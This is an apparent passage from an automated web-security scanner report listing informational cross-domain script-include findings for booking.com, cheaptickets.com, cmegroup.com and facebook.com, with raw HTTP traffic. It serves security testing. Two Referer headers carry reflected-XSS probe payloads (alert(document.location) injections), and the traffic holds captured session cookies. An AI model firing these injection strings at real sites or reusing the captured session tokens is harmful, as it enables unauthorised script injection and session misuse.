3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:15 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9Yc0ZDC9Mu1EAoq1YwiyYkrOHiSAuf28JqI%2BHOflGdlheWSd4aqQ4S9kWAAPfsgw9D66T4wFMCvqGXXx5W9GuJCr25Uqmhj2UpMobDN%2FaI4MouzypAXiHMMHYcyBghPwRPhIR0vlB6Ol8jmLM553G35F%2B2EC9Ct3b6%2FTJ5NqEwZrR9Q%2FH0ukz26yit6QyLTSqcuI2HLQ0VsBUAFVCwlLNxmZuDxyotE%2FwnVYDN1NaPr%2BQ2jMezA%2BQ93xNHE6sHvC2H6NcKqXTt11C7HRYqikso%2BSN%2F4epQIaoqYzVIVHsmZRY8UEQjW5%2FO3Xg3BPtScIum6RN1CcSwBbw2larrInKU6nVmRnGhZFZSu5P%2BH00JmkPzIwtu%2BRR4GgAt2IGq05uSTlyXitF3cA50IfBrXVmzdkzGeF1VQCDl7z%2Bt%2FJ%2FKFnjy9xLhsGvqxJch%2BJrNhkB55c%2FG59roS3buqyAq0TEWAvcdvIs6%2F2UswXdj84aVmCpFWEP7U4%2B3xDuwHi0ZNcE5TtRm2o%2F%2BoVJd9F2TJoqWCE3rBlE2yxL6TdLx9MVgUJv1gc41uBXXGirUBK4SUch8xbCWkl6QTjnYqTCwy8Q%2B%2BmmvhcEChhoBMA6VhIARqLepo8zZ4NgkZsML2nekGw6xRTGM3ca9%2BhMNuoQerjyZvoEu%2FiiH5epR8lpu1HdXNkP0JMNwUWbXzVoEFW92XZe0L8NnZnv34ij1h7BNEk%2BNfqH74wSscgE3wSh0k6ppJE%2Fv9Q8CWuQjBxGKNwr1f2m4Y5TBAI%2BXMckHMBU4%2FG7kpH9XWlaEE4jIt3ALDerskaJo%2BV8L3WCqL8TpX%2BjJlIwJorneFW4eRPNnjpO7sa5YnjqXQwY7kXZWJmN0iVllVt%2FYiNv%2BJq27oaMfjKg7Cz%2BYMz6xSi358Az%2BUCKrCbX68Fejx4UjmRPykDsTcLdD%2BEgyrL1SNvGkFwireGYoqBlUwvX3GYoLcIqONZ4Yuut3w9lOOQNlzXsEUDgQVh%2BI9y7LbESfSW6qGzvYcPpv9xT5TvyQz8z%2FdLDnJJE4D%2BCX2OqQECV32gxKWqLDPgPMvd5a6f3QefT%2BprihDvGDFB%2BprGC%2BccmQL6Yqlr1LqR8bUfmLkF2zwpJUXtO99dcZUw7e6ZxAAvL%2BYr9RrWIU3HuipBrjB%2BVvi9H6DSiBWFxPZk8JvSfmEGq6tDPdi7w2Eyzhum14uflewChdQsVk0SSagrC%2FFdQVu0SyWSHpLf9foVCCVupPIIZ53zHlztSaLpLIAQ7h0rb0XNYPeGEKZaU%2F5jXL2MP2Dnersuv1CqSOtI2VraCP4a6Djbv98BjLgf8UNBaznO6oUgiu4eKAEvOAmLbwIDPAnRTWvBX6d4fP68Dujy0%2FEg9nDhyC4YyPhd8sGLqQCt8iqt3wu7ZlqNcOFUdd6sQlb91qP8GTmymg04fczRJUsyLLBjH4iyApv8l; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:14:16 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 248794
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/hotel.1191.js"></script>
...[SNIP]...

20.47. http://www.booking.com/index.en-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /index.en-us.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/hotel57'%3balert(document.location)//f/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74miFZb2Um8KgC%2Bh2rlNFJUOjhhIgDQiMlPWhvbR49z9NRCDXfmSFpQembJKACe%2BJULD0r7fdmKnWzXr6Q37gpPtlW%2B6Ycux8%2BQPqDGsS1KPc9u0j692wwry%2B1siL5lr7hR9RhSAx8eI5I5k7yEH5VzxQ664kWGsWIUlKeHSweLMihfk6DPyMYhl866qu17PfAa6RO7hkvCmVs2v%2BaHqg7PJzGQbn7fwikGZMVbIAz4LrPjzYz6RGzlbxPK5%2F6ncWhf61P8AYKmRsuHJABk5Lxudx1AECQ0vDe%2B5%2F1VK1DpRN%2FD3xPq17PxcY9moJWiAb%2BjDEsnffG8T15GZqbMnfilArnMwyxxOT479XlQbNZXA5wZsuxCJNcZhMvajEXssRbYOUmix6AuHsUneEzF62bP002BL%2BgHy8NmOxhlKYaZlXZminydIqX%2Fu%2FBy9TbfbjXbd6r03fOvrqSW1QZ5jOepBwaJyVDLVWgjbd7NGZGnNsrR8ymzJg6wSt%2BGBUXZRUrcXlY6XVXUb8p7iRLBqAwcZN69gzv7DlytCjEgIc8%2F1Pep0%2Bm1h%2BeZlaydw4HC8erBX0MQS0wB%2BXiV0wXshT55Dj0GZBEX9npRlDKVH1zcH5tfl%2BmWNqGH5XrB8at9vS%2BFPgBOKqzPuPTEEm8M58LZw0SljaZgLLizNagYMqS2INu%2FxnbGaVC%2ByaJm99%2BSM7Is7WKkS82lDPlkm2julAIA%2Bq8cNhWIfpowac5T4r5u8Fn6f47z4hzIRARVjqBajBoVpoaNDPINwfkzD4VfF56AGT0g5nl8Q7zNch34tNcMpk1%2BpxM9%2BeaPaq8rTMHiSOsqbFRFOpXlvDxoUc439HccepEUKuW5qaj1VtdMlnVkiFiM%2Bv%2FwpfCePqzf0HGDSWdKf4NdncvuGc4CXQI%2BcT1om0pVGjGqsomGmH5HTip5D56Qw4RbL1v%2BcB6vVJ8%2F%2BKKQpUqdlMXTFa1kXsfq1zqNHmx93uxn4vcRnr2nx4M%2Fa2unp0CpnQQtAdh8E%2FREJ8eW%2FMdmAsrtsIFg0YBu5y4jzrewC%2FkgM9lOWRIg7XukObhLsYxWaE2laG%2B2TpO4jVJz35UlsuhFr2M5p%2Bd57HfkCUX%2BZTXu6qnSpFmzXSfgDeuWJWTFzXoBQEohozrytDzbYjlfb%2B7JSaJ1vXhcy15EpDbJEyN7kfvx%2Bi4F9skpy0c1fc5ZZIjkPBPbd9qFhsWxA8UMVqn8PV68J38KAFmJ4JSDNSSjUndN8EgnrUkMPtAr2yReY1C1LjICryrAap9gVMLJKV9n8njP4Nsr%2BXpDV7BLYvLgTFOQ; __utma=1.1339354214.1317600621.1317603252.1317603725.3; __utmb=1.5.9.1317605413177; __utmc=1; __utmz=1.1317603725.3.3.utmcsr=tripad|utmccn=(not%20set)|utmcmd=SPPC|utmctr=hotel-59554|utmcct=text-cr; BJS=-; ramala=12.6519598960876

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:30:58 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN41dGlG0KbBsKqdlryV2YMpyAycJPmGespKu%2FhvMH%2Bcml0MfZ8A3ADJmd0MPnRSrNRZRaXhMOvd2kmD1ykHQKaTCcYuaNBykbfcIHf7qGipxec1ymPHBj%2BSPuY3eJ2t1gAhSxFt7C%2BXKIWT1%2BF%2BNseMD8tm%2BoBpHmY%2B4G8epSAxtgFe1r%2FZ%2BxYDjuD2NpPo6C9jBeKN0S3X8qZLiL35HDHITVkM52TvKbaTeW4KxHTDD5RUcIueLKTZg0BO87d9%2Fxc9VCRdnjKNerj1geW2DZOmfjBGz9GYJMoCdarKmUVAsnR0iXlxgtoIXiGK6B0iPx0xH19c3KJP%2Fkub96OFhR33o7ZjjY237VztvCv20%2BHP3eevg5x8InAGExRh%2BYDvVr7pMcvgIG%2Biwukv%2Bq9IdotNCKKOLZ6LNaa3MP5RZd4JuSJ7vTwJ1p7wUjgsfT2YbU1xQeOK0dMNLi3JElFSD4F%2FYFW9YiNE7m9wsE1lVwpCtME41Qchw1Vrngk0a1c2nsxR9AK8%2BdGLTXQZIqaX4yxY6u6rDwYTTn9YDLkgj%2FqhC0cwPd3mWQk2TRp7JjCV6QejLIM9ULw05UxEAjMpxK3vPohrcX2dsf%2BWDK0fV7zagYQT75cLLxuOgvaBbz90dOfvgIsFEMSW9sv9%2BxL10EqJVw1joKPhcjSWnExfbMdsPwCTbHfJjKvai8%2BeQjZXTUdImR26CVh6mh94DKTT2raUiRxZ5uqelBYtyq9RuiJ%2BpbscXeCEQqzzhaWnh6i3tUV4WbqEugtNMgyRESMS1MnuJG7QiKCzkPwKX%2B%2Fxf1UUgjxu%2BwiKHptFD3Gm0ZKfZYcSGS6wybLkXfBw3muIaLdnewJ%2BpktRlg%2BNM6RkvzSSrP0W%2FiY7C8yQ7YJO5ly%2FdA4yb2eNrI2eaSdHozvCCCVTHBJhW4MqhZ%2B3nHMhXrSa%2F3pP9dmdho1W%2Br6D5fEJmtuYd6%2BmW2CPKlXnvJE%2BWu%2F3HIBZaTQze6WQZBzPFo1MFb9EaE14fMMVy7QmARBtbNqT5hU3b4gi2RCrc57nrocp6I6V786mK%2FXMTbtzGwruafLcYHsfPiR8bJphP3zeq9fFHeR2PL4RIPEK4qhSIOgu5t%2BRQaCb37oFN1O%2BThaGtxLG5Zx%2BrhnjoX%2BIh6Ugpw0W8qzEURgDkAxaWeVhqSVEFhcUByxRvPZl5ooVeMvflIYStfkx4fo1p7XLfUSIwc1ZSQBCt1Xi7L34Tl7mLvy1OzzWRkNtG2J0U21ZAtpTsV0%2B5WXRMAZHIo8j3YhZPe6Sy58aUCfgQu%2FHDYDHxKLTRS%2F3hToUO2lIaqTSxxDxjZiwuWpTRETXxHgk6R0Zm5X3xC2768YFIzCnCh%2FFYvpX4Ydn8FeRl9mompZttcmHllz%2FCH2TKO3pA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:30:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 201048
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...

20.48. http://www.booking.com/searchresults.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>
...[SNIP]...
<img src="http://q.bstatic.com/static/img/marker-city-large.png" style="display: none;" />


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/maps_v3.1191.js"></script>
...[SNIP]...

20.49. http://www.cheaptickets.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cheaptickets.com
Path:   /shop/hotelsearch

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=c_trip_hot&gcid=C16036x354&lpid=plhot HTTP/1.1
Host: www.cheaptickets.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=7567558764917771317602252; NSC_xxx.difbqujdlfut.dpn.80_gxe=ffffffff09e3887845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="IND NON DSP UNI COM INT STA CUR PSAo PSDo IVAo IVDo OUR"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxNjAzNngzNTR8IHwxMzE3NjAyMzI1NzUwfEMxNjAzNngzNTR8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=cheaptickets.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 432985


...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard bottom2" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=bottom2&amp;Section=results&amp;channel=hotel&amp;tile=1317602326322&amp;refUrl=http%3A%2F%2Fwww.cheaptickets.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=ctix&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=CTIX&amp;language=en_US"></script>
...[SNIP]...

20.50. http://www.cmegroup.com/advance/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cmegroup.com
Path:   /advance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /advance/ HTTP/1.1
Host: www.cmegroup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://spe.atdmt.com/ds/DWDWCCMEXCME/Collective_Trade_728x90.swf?ver=1&clickTag1=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01&clickTag=http://clk.specificclick.net/click/v=5;m=2;l=24038;c=178619;b=1058368;ts=20111002201331;dct=http://clk.atdmt.com/go/352348532/direct;ai.209087168;ct.1/01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=239709073.1864766951.1315448948.1315448948.1315448948.1; __utmz=239709073.1315448948.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 9275
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:26:39 GMT
Connection: close
Set-Cookie2: Apache=128.241.91.4.1317601599674056; path=/; max-age=1209600; domain=.cmegroup.com; version=1


<!DOCTYPE html>
<html lang="en-us" class="no-js">
<head>
<meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="fragment" content="!">

   
...[SNIP]...
</a><script src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</footer>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
...[SNIP]...

20.51. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?api_key=120836677942069&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22fd1ef3c%26origin%3Dhttp%253A%252F%252Fwww.nike.com%252Ff20d909cc%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=false&height=60&id=51212153078&locale=en_US&sdk=joey&show_faces=false&stream=false&width=450 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nike.com/nikefootball/home/?locale=en_US&ref=http%3A%2F%2Fwww.manutd.com%2FSearch-Results.aspx%3Fqs%3Dmanutd_frontend%26catTxt%3D%26searchText%3Dxss75931%253Cscript%253Ealert(document.location)%253C%2Fscript%253E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ivleTmw_y94Pr8J55qefqDAM; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dsocialmedia.cisco.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fsocialmedia.cisco.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.119.45
X-Cnection: close
